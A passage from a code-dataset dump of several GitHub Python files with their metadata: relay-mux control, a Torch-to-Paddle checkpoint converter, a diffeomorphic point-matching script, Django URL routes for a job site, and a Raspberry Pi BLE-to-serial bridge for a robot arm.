\"\"\"\n self.elexol_DIO.port_NC(self.port)\n self.DAC_0_HVB.select_NO()\n self.DAC_1_SA.select_NO()\n\n def SA_HVB(self):\n \"\"\"connect the NI analog output DAC0OUT to SENSEA, DAC1OUT to HVB\n \"\"\"\n self.elexol_DIO.port_NC(self.port)\n self.DAC_0_SA.select_NO()\n self.DAC_1_HVB.select_NO()\n\n def HVB_SB(self):\n \"\"\"connect the NI analog output DAC0OUT to HVB, DAC1OUT to SENSEB\n \"\"\"\n self.elexol_DIO.port_NC(self.port)\n self.DAC_0_HVB.select_NO()\n self.DAC_1_SB.select_NO()\n\n def SB_HVB(self):\n \"\"\"connect the NI analog output DAC0OUT to SENSEB, DAC1OUT to HVB\n \"\"\"\n self.elexol_DIO.port_NC(self.port)\n self.DAC_0_SB.select_NO()\n self.DAC_1_HVB.select_NO()\n\n def D0_to_HVB_and_SB_common_mode(self):\n \"\"\"connect both HVB and SB to DAC0OUT in common mode configuration\n \"\"\"\n self.elexol_DIO.port_NC(self.port)\n self.DAC_0_HVB.select_NO()\n self.DAC_0_SB.select_NO()\n\n def D1_to_HVB_and_SB_common_mode(self):\n \"\"\"connect both HVB and SB to DAC0OUT in common mode configuration\n \"\"\"\n self.elexol_DIO.port_NC(self.port)\n self.DAC_1_HVB.select_NO()\n self.DAC_1_SB.select_NO()\n\n def all_open(self):\n \"\"\"open all relays in the mux\n \"\"\"\n self.elexol_DIO.port_NC(self.port)\n\n\n\n\n", "repo_name": "tawender/Python_Programs", "sub_path": "modules/elexol_relays.py", "file_name": "elexol_relays.py", "file_ext": "py", "file_size_in_byte": 5860, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sys.path.append", "line_number": 4, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 4, "usage_type": "attribute"}, {"api_name": "serial.Serial", "line_number": 12, "usage_type": "call"}, {"api_name": "elexol.Elexol", "line_number": 20, "usage_type": "call"}]} +{"seq_id": "41733339410", "text": "from subprocess import check_output\nimport numpy as np\nimport torch\nimport paddle\n\ndef torch2paddle():\n torch_path = './data/test_diff/checkpoint.pth.tar'\n paddle_path = \"./data/test_diff/checkpoint_paddle.pdparams\"\n checkpoint = torch.load(torch_path)\n backbone = checkpoint['backbone']\n classifier = checkpoint['classifier']\n fc_names = [\"fc\", \"W\"]\n checkpoint_paddle = {}\n backbone_paddle = {}\n classifier_paddle = {}\n for k in backbone:\n if \"num_batches_tracked\" in k:\n continue\n v = backbone[k].detach().cpu().numpy()\n flag = [i in k for i in fc_names]\n if any(flag) and \"weight\" in k: # ignore bias\n new_shape = [1, 0] + list(range(2, v.ndim))\n print(f\"name: {k}, ori shape: {v.shape}, new shape: {v.transpose(new_shape).shape}\")\n v = v.transpose(new_shape)\n k = k.replace(\"running_var\", \"_variance\")\n k = k.replace(\"running_mean\", \"_mean\")\n backbone_paddle[k] = v\n for k in classifier:\n if \"num_batches_tracked\" in k:\n continue\n v = classifier[k].detach().cpu().numpy()\n classifier_paddle[k] = v\n checkpoint_paddle['backbone'] = backbone_paddle\n checkpoint_paddle['classifier'] = classifier_paddle\n checkpoint_paddle['epoch'] = checkpoint['epoch']\n for k in checkpoint_paddle['backbone']:\n print(k)\n for k in checkpoint_paddle['classifier']:\n print(k)\n\n paddle.save(checkpoint_paddle, paddle_path)\n\nif __name__ == \"__main__\":\n torch2paddle()\n \"\"\"checkpoint = torch.load(\"./data/test_diff/checkpoint.pth.tar\")\n for i in checkpoint['backbone']:\n print(i)\n for i in checkpoint['classifier']:\n print(i)\"\"\"", "repo_name": "oliverck/Augmented-Geometric-Distillation-PaddlePaddle", "sub_path": "torch2paddle.py", "file_name": "torch2paddle.py", "file_ext": "py", "file_size_in_byte": 1724, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "torch.load", "line_number": 9, "usage_type": "call"}, {"api_name": "paddle.save", "line_number": 41, "usage_type": "call"}]} +{"seq_id": "483453836", "text": "import math as m\nimport re\n\nimport click\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy.io import loadmat\nimport torch\n\n\nclass Mesure:\n\n def __init__(self, point, poid):\n self.point = point \n self.poid = poid\n\ndef ker_mat_torch(x, sigma):\n return(torch.exp(-x/(sigma**2))) #\n\ndef fv_exp(x, y, sigma):\n return(torch.exp(-torch.norm(((x-y)/sigma))**2)) # Compute the norm in the hilbert space using RKHS\n\ndef test_j1_torch(alpha, mu, sigmaV):\n return(torch.sum(torch.mul(torch.mm(alpha, torch.t(alpha)), ker_mat_torch(\\\n torch.sum((torch.transpose(mu.point[np.newaxis, :, :], 1, 0)-mu.point)**2, dim = 2), sigmaV))))\n\ndef test_j2_torch(alpha, mu, nu, p, sigmaI):\n A = torch.sum(torch.mul(torch.mm(mu.poid[:, np.newaxis], torch.t(mu.poid[:, \\\n np.newaxis])), ker_mat_torch(torch.sum((torch.transpose(p[np.newaxis, :, \\\n :], 1, 0)- p)**2, dim = 2), sigmaI)))\n \n B = torch.sum(torch.mul(-2 * torch.mm(mu.poid[:, np.newaxis], torch.t(nu.poid\\\n [:, np.newaxis])), ker_mat_torch(torch.sum((torch.transpose(p[np.newaxis,\\\n :, :], 1, 0) - nu.point)**2, dim = 2), sigmaI)))\n\n C = torch.sum(torch.mul(torch.mm(nu.poid[:, np.newaxis], torch.t(nu.poid[:, \\\n np.newaxis])), ker_mat_torch(torch.sum((torch.transpose(nu.point[np.newaxis\\\n , :, :], 1, 0) - nu.point)**2, dim = 2), sigmaI)))\n return(A + B + C)\n\ndef grad_descent2(mu, nu, delta, n, sigmaI, sigmaV, sigmaR, alpha):\n r = 0\n while r <= n: \n test_j1_torch(alpha, mu, sigmaV).backward()\n gradient_1 = alpha.grad\n p = mu.point + construction_v(mu, alpha, sigmaV)\n test_j2_torch(alpha, mu, nu, p, sigmaI).backward()\n gradient_2 = alpha.grad\n alpha.data = alpha.data - delta*(gradient_1 + (1/sigmaR**2)*gradient_2)\n alpha.grad.zero_()\n r += 1\n return(alpha)\n\ndef construction_v(mu, alpha1, sigmaV):\n v_opt = torch.mm(torch.t(ker_mat_torch(torch.sum((torch.transpose(mu.point[np.newaxis, :, :], 1, 0)\\\n -mu.point)**2, dim = 2), sigmaV)), alpha1)\n return(v_opt)\n\ndef import_matrices(origin_name):\n # Import check for filename extension\n if not re.search(r'.*?\\.mat$', origin_name):\n raise Exception('Wrong extension name {}, should be .mat'.format(origin_name))\n return()\n else:\n return(loadmat(origin_name))\n\n\n@click.command()\n@click.option('--origin', help='origin matrix file, (x,y)')\n@click.option('--sigma_i', help='Range of the norm, default behavior assume data in [0, 1]', default=0.4)\n@click.option('--sigma_v', help='Range of the norm, pratically same as sigma_i', default=0.4)\n@click.option('--sigma_r', help='Trade-off parameter between regularity of deformation and precision of the method', default=0.1)\n@click.option('--precision', is_flag=True, help=\"If set to true, will execute an additional step for precision improvment. default:True\", default=True)\n\ndef main(*args, **kwargs):\n x_4 = import_matrices(origin_name=kwargs['origin'])\n x4, y4 = [v for (k, v) in x_4.items() if not k.startswith('__')]\n sigmaI = kwargs['sigma_i']\n sigmaV = kwargs['sigma_v']\n sigmaR = kwargs['sigma_r']\n FLAG_PRECISION = kwargs['precision']\n mu = Mesure(torch.tensor(x4, dtype = torch.float32), 1*torch.rand(x4.shape[0])) # Origin points with random weights given to data to illustrate\n nu = Mesure(torch.tensor(y4, dtype = torch.float32), 10*torch.rand(y4.shape[0])) # Target points again with randomized weights\n\n alpha_0 = torch.zeros(np.shape(mu.point), requires_grad = True)\n alpha_test = grad_descent2(mu, nu, 0.0000000001, 20, sigmaI, sigmaV, sigmaR,\\\n alpha_0 )\n v_test = construction_v(mu, alpha_test, sigmaV)\n\n if FLAG_PRECISION == True:\n for j in range(4):\n sigmaI = sigmaI/2\n alpha_test = grad_descent2(mu, nu, 0.0000000001, 100, sigmaI, sigmaV\\\n , sigmaR, alpha_test)\n\n v_test = construction_v(mu, alpha_test, sigmaV).detach().numpy()\n plt.title(\"Appariemment de points :\")\n plt.scatter(mu.point[:, 0], mu.point[:, 1], c='r')\n plt.scatter(nu.point[:, 0], nu.point[:, 1], c='g')\n plt.legend((\"Points de base\", \"Points cibles\"))\n m, d = np.shape(mu.point)\n for ligne in range(0, m):\n plt.arrow(mu.point[ligne, 0], mu.point[ligne, 1], v_test[ligne, 0], v_test[ligne, 1])\n plt.show()\n\n\nif __name__ == '__main__':\n main()", "repo_name": "MBlackmane/Diffeomorphic-matchings", "sub_path": "diffeomorphic.py", "file_name": "diffeomorphic.py", "file_ext": "py", "file_size_in_byte": 4391, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "torch.exp", "line_number": 18, "usage_type": "call"}, {"api_name": "torch.exp", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.norm", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 24, "usage_type": "call"}, {"api_name": "torch.mul", "line_number": 24, "usage_type": "call"}, {"api_name": "torch.mm", "line_number": 24, "usage_type": "call"}, {"api_name": "torch.t", "line_number": 24, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.transpose", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 25, "usage_type": "attribute"}, {"api_name": "torch.sum", "line_number": 28, "usage_type": "call"}, {"api_name": "torch.mul", "line_number": 28, "usage_type": "call"}, {"api_name": "torch.mm", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 28, "usage_type": "attribute"}, {"api_name": "torch.t", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 29, "usage_type": "attribute"}, {"api_name": "torch.sum", "line_number": 29, "usage_type": "call"}, {"api_name": "torch.transpose", "line_number": 29, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 32, "usage_type": "call"}, {"api_name": "torch.mul", "line_number": 32, "usage_type": "call"}, {"api_name": "torch.mm", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 32, "usage_type": "attribute"}, {"api_name": "torch.t", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 33, "usage_type": "attribute"}, {"api_name": "torch.sum", "line_number": 33, "usage_type": "call"}, {"api_name": "torch.transpose", "line_number": 33, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 36, "usage_type": "call"}, {"api_name": "torch.mul", "line_number": 36, "usage_type": "call"}, {"api_name": "torch.mm", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 36, "usage_type": "attribute"}, {"api_name": "torch.t", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 37, "usage_type": "attribute"}, {"api_name": "torch.sum", "line_number": 37, "usage_type": "call"}, {"api_name": "torch.transpose", "line_number": 37, "usage_type": "call"}, {"api_name": "torch.mm", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.t", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.transpose", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 55, "usage_type": "attribute"}, {"api_name": "re.search", "line_number": 61, "usage_type": "call"}, {"api_name": "scipy.io.loadmat", "line_number": 65, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 82, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 82, "usage_type": "attribute"}, {"api_name": "torch.rand", "line_number": 82, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 83, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 83, "usage_type": "attribute"}, {"api_name": "torch.rand", "line_number": 83, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 85, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 97, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 97, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 98, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 98, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 99, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 100, "usage_type": "name"}, {"api_name": "numpy.shape", "line_number": 101, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.arrow", "line_number": 103, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 103, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 104, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 104, "usage_type": "name"}, {"api_name": "click.command", "line_number": 68, "usage_type": "call"}, {"api_name": "click.option", "line_number": 69, "usage_type": "call"}, {"api_name": "click.option", "line_number": 70, "usage_type": "call"}, {"api_name": "click.option", "line_number": 71, "usage_type": "call"}, {"api_name": "click.option", "line_number": 72, "usage_type": "call"}, {"api_name": "click.option", "line_number": 73, "usage_type": "call"}]} +{"seq_id": "10013472853", "text": "from django.conf.urls.static import static\nfrom django.conf import settings\nfrom django.conf.urls import url, include\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.oferta_list, name='oferta_list'), #oferta_list jest defaultowo włączana jako strona głowna\n url(r'^oferta/$', views.oferta_list, name='oferta_list'),\n url(r'^oferta/(?P\\d+)/$', views.oferta_detail, name='oferta_detail'),\n url(r'^oferta/f=branza$', views.oferta_list_filter_branza, name='oferta_list_filter_branza'),\n url(r'^oferta/f=wakat$', views.oferta_list_filter_wakat, name='oferta_list_filter_wakat'),\n url(r'^oferta/f=lokalizacja$', views.oferta_list_filter_lokalizacja, name='oferta_list_filter_lokalizacja'),\n url(r'^oferta/f=wynagrodzenie$', views.oferta_list_filter_wynagrodzenie, name='oferta_list_filter_wynagrodzenie'),\n url(r'^firma/$', views.firma_list, name='firma_list'),\n url(r'^firma/(?P\\d+)/$', views.firma_detail, name='firma_detail'),\n url(r'^firma/f=nazwa_firmy$', views.firma_list_filter_nazwa_firmy, name='firma_list_filter_nazwa_firmy'),\n url(r'^firma/f=miasto$', views.firma_list_filter_miasto, name='firma_list_filter_miasto'),\n\n url(r'^aplikant/$', views.aplikant_list, name='aplikant_list'),\n url(r'^aplikant/f=wiek$', views.aplikant_list_filter_wiek, name='aplikant_list_filter_wiek'),\n url(r'^aplikant/f=imie$', views.aplikant_list_filter_imie, name='aplikant_list_filter_imie'),\n url(r'^aplikant/f=wyksztalcenie$', views.aplikant_list_filter_wyksztalcenie, name='aplikant_list_filter_wyksztalcenie'),\n url(r'^aplikant/(?P\\d+)/$', views.aplikant_detail, name='aplikant_detail'),\n\n\n url(r'^register/$', views.Register.as_view(), name='register'),\n url(r'^register/success$', views.register_success, name='register_success'),\n url(r'^upload/success$', views.upload_success, name='upload_success'),\n url(r'^aplication/success$', views.aplication_success, name='aplication_success'),\n url(r'^login/', views.login_view, name='login'),\n url(r'^logout/', views.logout_view, name='logout'),\n url(r'^update/(?P\\d+)/$', views.edit_user, name='account_update'),\n\n url(r'^add/oferta/$', views.add_oferta, name='add_oferta'),\n url(r'^edit/oferts/(?P\\d+)/$', views.edit_oferts, name='edit_oferts'),\n url(r'^aplications/$', views.show_aplications, name='show_aplications'),\n\n url(r'^upload_cv/$', views.upload_cv, name='upload_cv'),\n url(r'^aplication/$', views.add_aplication,name='add_aplication'),\n\n url(r'^captcha/', include('captcha.urls')),\n]\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)", "repo_name": "slawekrom/RSWTA_Projekt", "sub_path": "projekt/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 2649, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.conf.urls.url", "line_number": 7, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 8, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 9, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 10, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 11, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 12, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 13, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 14, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 15, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 16, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 17, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 19, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 20, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 21, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 22, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 23, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 26, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 27, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 28, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 29, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 30, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 31, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 32, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 34, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 35, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 36, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 38, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 39, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 41, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 41, "usage_type": "call"}, {"api_name": "django.conf.settings.DEBUG", "line_number": 43, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 43, "usage_type": "name"}, {"api_name": "django.conf.urls.static.static", "line_number": 44, "usage_type": "call"}, {"api_name": "django.conf.settings.MEDIA_URL", "line_number": 44, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 44, "usage_type": "name"}, {"api_name": "django.conf.settings.MEDIA_ROOT", "line_number": 44, "usage_type": "attribute"}]} +{"seq_id": "74010404995", "text": "# For Saving and Receiving/Sending Data\nimport json\nimport serial\nimport time\n\n# For Uart Connection\nimport sys\nimport dbus, dbus.mainloop.glib\nfrom gi.repository import GLib\nfrom example_advertisement import Advertisement\nfrom example_advertisement import register_ad_cb, register_ad_error_cb\nfrom example_gatt_server import Service, Characteristic\nfrom example_gatt_server import register_app_cb, register_app_error_cb\n \nBLUEZ_SERVICE_NAME = 'org.bluez'\nDBUS_OM_IFACE = 'org.freedesktop.DBus.ObjectManager'\nLE_ADVERTISING_MANAGER_IFACE = 'org.bluez.LEAdvertisingManager1'\nGATT_MANAGER_IFACE = 'org.bluez.GattManager1'\nGATT_CHRC_IFACE = 'org.bluez.GattCharacteristic1'\nUART_SERVICE_UUID = '6e400001-b5a3-f393-e0a9-e50e24dcca9e'\nUART_RX_CHARACTERISTIC_UUID = '6e400002-b5a3-f393-e0a9-e50e24dcca9e'\nUART_TX_CHARACTERISTIC_UUID = '6e400003-b5a3-f393-e0a9-e50e24dcca9e'\nLOCAL_NAME = 'Robot Arm'\nmainloop = None\n\n# Joint position data file name\njointPositionsFile = \"/home/pi/PROJET_ARGYLL/ble-uart-peripheral/data.json\"\n\n# Serial setup\nser = serial.Serial('/dev/ttyACM0', baudrate = 9600 , timeout=1)\n# ser.flush()\n\ndef SendingToOpenCr(self,data):\n Data_encode = data.encode('utf-8')\n ser.write(Data_encode)\n ser.flush()\n time.sleep(.01)\n\n while (ser.in_waiting > 0):\n\n line = ser.readline().decode('utf-8').rstrip()\n\n if (line[0] == \"<\"): \n print(\"From OpenCr: \"+line)\n send.send_tx(line)\n time.sleep(0.01) \n\n if (line == \"[\"):\n print(\"Receiving and saving joint positions\")\n data = {} # Init data dict\n data['jointPositions'] = []\n while True:\n line = ser.readline().decode('utf-8').rstrip() # Read serial input until '\\n'\n if (line == \"]\") or (line.find(\"{\") == -1):\n break\n lineArray = line.strip(\"{}\").split(':') # Removes brackets and splits on ':'\n data['jointPositions'].append({'positionID' : lineArray[0],'positionName' : lineArray[1],'joints' : lineArray[2].split(',')})\n with open(jointPositionsFile, 'w') as outfile:\n json.dump(data, outfile, indent=3)\n print(\"End of saving joint positions\")\n outfile.close()\n\n if (line == \"WaitingForSavingFile\"):\n print(\"Sending all data from the JSON file to the Arduino\")\n with open(jointPositionsFile) as infile:\n data = json.load(infile)\n print(\"[\")\n Data = \"[\"\n ser.write(Data.encode('utf-8'))\n for jPos in data[\"jointPositions\"]:\n Data = \"{\"+jPos[\"positionID\"] + \":\" + jPos[\"positionName\"] + \":\" + str(jPos[\"joints\"]).replace(\"'\",\"\").strip(\"[]\").replace(\" \",\"\")+\",}\"+\"\\n\"\n Data_encode = Data.encode('utf-8')\n ser.write(Data_encode)\n print(\"{\"+jPos[\"positionID\"] + \":\" + jPos[\"positionName\"] + \":\" + str(jPos[\"joints\"]).replace(\"'\",\"\").strip(\"[]\").replace(\" \",\"\")+\",}\")\n print(\"]\")\n Data = \"]\"\n ser.write(Data.encode('utf-8'))\n while (ser.in_waiting > 0):\n line = ser.readline().decode('utf-8').rstrip()\n print(line)\n time.sleep(0.01)\n infile.close() \n print(\"\")\n \n \n\n\n \nclass TxCharacteristic(Characteristic):\n\n def __init__(self, bus, index, service):\n Characteristic.__init__(self, bus, index, UART_TX_CHARACTERISTIC_UUID,\n ['notify'], service)\n self.notifying = False\n global send\n send = self\n GLib.io_add_watch(sys.stdin, GLib.IO_IN, self.on_console_input)\n\n \n def on_console_input(self, fd, condition):\n s = fd.readline()\n if s.isspace():\n pass\n else:\n SendingToOpenCr(self,s)\n self.send_tx(s)\n return True\n \n def send_tx(self, s):\n if not self.notifying:\n return\n value = []\n for c in s:\n value.append(dbus.Byte(c.encode()))\n self.PropertiesChanged(GATT_CHRC_IFACE, {'Value': value}, [])\n \n \n def StartNotify(self):\n if self.notifying:\n return\n self.notifying = True\n \n def StopNotify(self):\n if not self.notifying:\n return\n self.notifying = False\n\n\n\n def send(obj):\n s = obj\n global send\n value=[]\n for c in s:\n value.append(dbus.Byte(c.encode()))\n self.PropertiesChanged(GATT_CHRC_IFACE, {'Value': value}, [])\n\n\n \nclass RxCharacteristic(Characteristic):\n def __init__(self, bus, index, service):\n Characteristic.__init__(self, bus, index, UART_RX_CHARACTERISTIC_UUID,\n ['write'], service)\n\n\n\n \n\n# Sending/Receiving Data To/From OpenCr and Android \n \n def WriteValue(self, value, options):\n self.line = \"\"\n Data = format(bytearray(value).decode()) #+ \"\\n\"\n print(\"From Android: \"+Data)\n SendingToOpenCr(self,Data)\n \n\n \nclass UartService(Service):\n def __init__(self, bus, index):\n Service.__init__(self, bus, index, UART_SERVICE_UUID, True)\n self.add_characteristic(TxCharacteristic(bus, 0, self))\n self.add_characteristic(RxCharacteristic(bus, 1, self))\n \n \nclass Application(dbus.service.Object):\n def __init__(self, bus):\n self.path = '/'\n self.services = []\n dbus.service.Object.__init__(self, bus, self.path)\n \n def get_path(self):\n return dbus.ObjectPath(self.path)\n \n def add_service(self, service):\n self.services.append(service)\n \n @dbus.service.method(DBUS_OM_IFACE, out_signature='a{oa{sa{sv}}}')\n def GetManagedObjects(self):\n response = {}\n for service in self.services:\n response[service.get_path()] = service.get_properties()\n chrcs = service.get_characteristics()\n for chrc in chrcs:\n response[chrc.get_path()] = chrc.get_properties()\n return response\n \nclass UartApplication(Application):\n def __init__(self, bus):\n Application.__init__(self, bus)\n self.add_service(UartService(bus, 0))\n \nclass UartAdvertisement(Advertisement):\n def __init__(self, bus, index):\n Advertisement.__init__(self, bus, index, 'peripheral')\n self.add_service_uuid(UART_SERVICE_UUID)\n self.add_local_name(LOCAL_NAME)\n self.include_tx_power = True\n \ndef find_adapter(bus):\n remote_om = dbus.Interface(bus.get_object(BLUEZ_SERVICE_NAME, '/'),\n DBUS_OM_IFACE)\n objects = remote_om.GetManagedObjects()\n for o, props in objects.items():\n if LE_ADVERTISING_MANAGER_IFACE in props and GATT_MANAGER_IFACE in props:\n return o\n print('Skip adapter:', o)\n return\n\n\n\n\n# FOR SAVING ON THE START\n\ndef StartupSaving():\n\n line = \"\"\n\n #Data = \"\"\n #Data_encode = Data.encode('utf-8')\n #ser.write(Data_encode)\n #ser.flush()\n #time.sleep(.01)\n\n\n #while (line!=\"WaitingForSavingFile\"):\n line = ser.readline().decode('utf-8').rstrip()\n \n if (line == \"WaitingForSavingFile\"):\n print(\"Sending all data from the JSON file to the Arduino\")\n with open(jointPositionsFile) as infile:\n data = json.load(infile)\n print(\"[\")\n Data = \"[\"\n ser.write(Data.encode('utf-8'))\n for jPos in data[\"jointPositions\"]:\n Data = \"{\"+jPos[\"positionID\"] + \":\" + jPos[\"positionName\"] + \":\" + str(jPos[\"joints\"]).replace(\"'\",\"\").strip(\"[]\").replace(\" \",\"\")+\",}\"+\"\\n\"\n Data_encode = Data.encode('utf-8')\n ser.write(Data_encode)\n print(\"{\"+jPos[\"positionID\"] + \":\" + jPos[\"positionName\"] + \":\" + str(jPos[\"joints\"]).replace(\"'\",\"\").strip(\"[]\").replace(\" \",\"\")+\",}\")\n print(\"]\")\n Data = \"]\"\n ser.write(Data.encode('utf-8'))\n while (ser.in_waiting > 0):\n line = ser.readline().decode('utf-8').rstrip()\n print(line)\n time.sleep(0.01)\n infile.close()\n\n\n\n \n \n\n \ndef main():\n\n StartupSaving()\n #Data = \"\"\n #ser.write(Data.encode('utf-8')) \n \n global mainloop\n dbus.mainloop.glib.DBusGMainLoop(set_as_default=True)\n bus = dbus.SystemBus()\n adapter = find_adapter(bus)\n if not adapter:\n print('BLE adapter not found')\n return\n \n service_manager = dbus.Interface(\n bus.get_object(BLUEZ_SERVICE_NAME, adapter),\n GATT_MANAGER_IFACE)\n ad_manager = dbus.Interface(bus.get_object(BLUEZ_SERVICE_NAME, adapter),\n LE_ADVERTISING_MANAGER_IFACE)\n \n app = UartApplication(bus)\n adv = UartAdvertisement(bus, 0)\n \n mainloop = GLib.MainLoop()\n \n service_manager.RegisterApplication(app.get_path(), {},\n reply_handler=register_app_cb,\n error_handler=register_app_error_cb)\n ad_manager.RegisterAdvertisement(adv.get_path(), {},\n reply_handler=register_ad_cb,\n error_handler=register_ad_error_cb)\n\n try:\n mainloop.run()\n except KeyboardInterrupt:\n adv.Release()\n\n \n \nif __name__ == '__main__':\n main()\n", "repo_name": "charles-maheu/Argyll---developement", "sub_path": "Software/Code_For_RaspberryPi/Main.py", "file_name": "Main.py", "file_ext": "py", "file_size_in_byte": 9761, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "serial.Serial", "line_number": 30, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 37, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 46, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 59, "usage_type": "call"}, {"api_name": "json.load", "line_number": 66, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 81, "usage_type": "call"}, {"api_name": "example_gatt_server.Characteristic", "line_number": 89, "usage_type": "name"}, {"api_name": "example_gatt_server.Characteristic.__init__", "line_number": 92, "usage_type": "call"}, {"api_name": "example_gatt_server.Characteristic", "line_number": 92, "usage_type": "name"}, {"api_name": "gi.repository.GLib.io_add_watch", "line_number": 97, "usage_type": "call"}, {"api_name": "gi.repository.GLib", "line_number": 97, "usage_type": "name"}, {"api_name": "sys.stdin", "line_number": 97, "usage_type": "attribute"}, {"api_name": "gi.repository.GLib.IO_IN", "line_number": 97, "usage_type": "attribute"}, {"api_name": "dbus.Byte", "line_number": 114, "usage_type": "call"}, {"api_name": "dbus.Byte", "line_number": 135, "usage_type": "call"}, {"api_name": "example_gatt_server.Characteristic", "line_number": 140, "usage_type": "name"}, {"api_name": "example_gatt_server.Characteristic.__init__", "line_number": 142, "usage_type": "call"}, {"api_name": "example_gatt_server.Characteristic", "line_number": 142, "usage_type": "name"}, {"api_name": "example_gatt_server.Service", "line_number": 159, "usage_type": "name"}, {"api_name": "example_gatt_server.Service.__init__", "line_number": 161, "usage_type": "call"}, {"api_name": "example_gatt_server.Service", "line_number": 161, "usage_type": "name"}, {"api_name": "dbus.service", "line_number": 166, "usage_type": "attribute"}, {"api_name": "dbus.service.Object.__init__", "line_number": 170, "usage_type": "call"}, {"api_name": "dbus.service", "line_number": 170, "usage_type": "attribute"}, {"api_name": "dbus.ObjectPath", "line_number": 173, "usage_type": "call"}, {"api_name": "dbus.service.method", "line_number": 178, "usage_type": "call"}, {"api_name": "dbus.service", "line_number": 178, "usage_type": "attribute"}, {"api_name": "example_advertisement.Advertisement", "line_number": 193, "usage_type": "name"}, {"api_name": "example_advertisement.Advertisement.__init__", "line_number": 195, "usage_type": "call"}, {"api_name": "example_advertisement.Advertisement", "line_number": 195, "usage_type": "name"}, {"api_name": "dbus.Interface", "line_number": 201, "usage_type": "call"}, {"api_name": "json.load", "line_number": 232, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 247, "usage_type": "call"}, 